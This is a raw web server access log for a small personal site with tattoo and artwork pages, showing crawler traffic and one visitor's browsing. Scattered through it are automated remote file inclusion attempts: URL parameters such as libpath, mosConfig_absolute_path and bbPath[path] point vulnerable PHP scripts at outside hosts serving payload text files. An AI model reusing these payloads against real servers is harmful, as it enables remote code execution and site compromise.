66.249.71.36 - - [02/May/2010:01:53:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.36 - - [02/May/2010:01:53:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.115.111.248 - - [02/May/2010:01:53:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
203.241.231.63 - - [02/May/2010:01:55:07 -0500] "GET //modules/errors.php?error=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
203.241.231.63 - - [02/May/2010:01:55:07 -0500] "GET /logs//modules/errors.php?error=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.241.231.63 - - [02/May/2010:01:55:07 -0500] "GET /logs/access_log.1268956800%20%20//modules/errors.php?error=http://www.talkpic.com/bbs/icon/private_name/id/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:01:56:08 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:01:56:08 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:01:56:08 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://orelhas.pt/images/stories/id1?????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.184.41.88 - - [02/May/2010:01:57:00 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:00 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:06 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:07 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:17 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:28 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:29 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:40 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:41 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:54 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:54 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:54 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:57:54 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
65.184.41.88 - - [02/May/2010:01:58:04 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
87.250.255.243 - - [02/May/2010:02:00:20 -0500] "GET /logs/access_log.1258761600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [02/May/2010:02:01:18 -0500] "GET /logs/access_log.1265932800/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:18 -0500] "GET /logs/access_log.1237334400/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:18 -0500] "GET /SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:18 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:23 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:23 -0500] "GET /logs/access_log.1265932800/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:23 -0500] "GET /logs/access_log.1237334400/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:01:23 -0500] "GET /SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:02:37 -0500] "GET /SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:02:48 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:02:48 -0500] "GET /logs/access_log.1198454400%20%20/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:03:05 -0500] "GET /logs/access_log.1213401600%20%20/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:03:25 -0500] "GET /SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:03:35 -0500] "GET /logs/access_log.1198454400%20%20/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:03:35 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:02:03:50 -0500] "GET /logs/access_log.1213401600%20%20/SQuery/lib/gore.php?libpath=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:02:07:42 -0500] "GET /logs/access_log.1227484800%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:02:07:42 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:02:07:42 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:02:07:45 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:02:07:45 -0500] "GET /logs/access_log.1227484800%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
210.125.133.87 - - [02/May/2010:02:07:45 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:02:08:48 -0500] "GET /logs/access_log.1250812800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.50.85.15 - - [02/May/2010:02:13:57 -0500] "GET /logs/access_log.1268611200//?_SERVER[DOCUMENT_ROOT]=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.50.85.15 - - [02/May/2010:02:13:57 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.50.85.15 - - [02/May/2010:02:13:57 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.pomirci.ru////////admin/head.txt?? HTTP/1.1" 200 3998 "-""Mozilla/5.0"
207.46.13.95 - - [02/May/2010:02:15:25 -0500] "GET /logs/access_log.1244937600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.63.198.11 - - [02/May/2010:02:15:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.112.180 - - [02/May/2010:02:15:52 -0500] "GET /logs/access_log.1179878400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.29.35.67 - - [02/May/2010:02:16:14 -0500] "GET /logs/access_log.1262476800 HTTP/1.1" 404 310 "http://114search.118114.cn/search_web.html?id=629&kw=wapchat.tom.con""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )"
87.250.255.243 - - [02/May/2010:02:19:01 -0500] "GET /logs/access_log.1254873600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.182 - - [02/May/2010:02:19:24 -0500] "GET /logs/access_log.1245888000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.229 - - [02/May/2010:02:24:55 -0500] "GET /artwork/llpostcards.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.37 - - [02/May/2010:02:24:55 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:02:28:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [02/May/2010:02:29:55 -0500] "GET /logs/access_log.1230854400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:02:30:00 -0500] "GET /logs/access_log.1262822400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.22.100.83 - - [02/May/2010:02:34:30 -0500] "GET //uigaproxy/include/template.php?content=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:02:34:30 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.22.100.83 - - [02/May/2010:02:34:30 -0500] "GET /logs//uigaproxy/include/template.php?content=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.236.235.245 - - [02/May/2010:02:37:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [02/May/2010:02:37:19 -0500] "GET /rachel%20study HTTP/1.0" 404 284 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
207.46.204.188 - - [02/May/2010:02:38:25 -0500] "GET /logs/access_log.1198972800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.63.198.62 - - [02/May/2010:02:46:47 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
87.250.255.243 - - [02/May/2010:02:48:17 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.132 - - [02/May/2010:02:59:24 -0500] "GET /logs/access_log.1178841600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.189 - - [02/May/2010:02:59:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:02:59:45 -0500] "GET /logs/access_log.1230940800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
